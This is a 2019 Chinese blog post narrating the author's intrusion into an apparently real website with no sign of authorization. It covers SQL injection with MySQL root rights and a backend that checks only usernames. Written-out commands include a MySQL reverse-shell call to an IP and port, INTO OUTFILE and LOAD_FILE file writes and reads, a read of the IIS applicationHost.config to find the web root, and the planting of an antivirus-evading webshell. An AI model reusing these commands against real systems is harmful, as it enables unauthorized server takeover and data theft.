记一次曲折的获取网站路径
2019年07月28日
网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找 最后发现存在管理员的表的是一个不显眼的表里面,登录到后台发现后台只验证账号不验证密码。
本来想这后台的权限应该很大,扎心了。 编辑器都是不能利用的正常上传个图片都无法上传,最后发现很多栏目都是有问题的 IE6也是如此 只有一个可以正常上传图片的 还是无法利用的那种。起初我还在纳闷这个网站的运营者是怎么每天在更新的。后台就这样告一段落。数据库root权限试了下支持外链,想着这下数据库直接可以getshell了。看到了数据库的安装路径想着网站的路径的也在PHPWEB 的这个路径下
select backshell("192.168.106.137",2010); mysql反弹端口
SELECT '1111' INTO OUTFILE 'D:\\PHPWEB\1.txt' //使用outfile 进行写文件
SELECT LOAD_FILE('D:\\PHPWEB\\1.txt') //使用load_file读取文件
正常可读写,尝试让网站与数据库交互时报错爆出路径,试了好一会无果,然后根据尝试 wwwroot 、www、webroot 、web、网站域名、等等都没有猜到!尝试在数据库写马到网站里让其爆错,写的PHP文件都是被注释掉了!接下来转换思路寻找它使用的是什么集成环境 一般不是集成的都是安装在C盘的。根据经验发现他使用的是护卫神,护卫神自带phpmyadmin是对外开放的 IP:999发现不行人为关掉了。其实在此之前我在纳闷root权限 sqlmap 为什么 os-cmd 执行不成呢,原来是被拦截了!!!继续转换思路WEB服务器是IIS7.5 报错信息关掉了。那就去找IIS 的日志 ,试了好多都没有读出来有用的东西,file://D:/ 这个路径真没毛病 。。。。 file 调用 本地 还是中文 目录 中文就放弃了 。。。继续寻找其他的目录
C:\Windows\System32\inetsrv\config\applicationHost.config
在这个路径下找到有用的信息 物理路径 D:\sscw98 其他目录都是中文目录,这下总可以getshell了吧
去数据库执行了 一下 可以正常读写。尝试写了个php文件发现 无法显示 有护卫神 上免杀马
SELECT '123' INTO OUTFILE 'D:\\sscw98\1.txt' SELECT LOAD_FILE('D:\\sscw98\\1.txt')
成功getshell!!! 找这个物理路径费了好大劲。
查找包含 web.config 文件
for /r c: %i in (web.config) do @echo %i
参考链接 https://www.jb51.net/article/112583.htm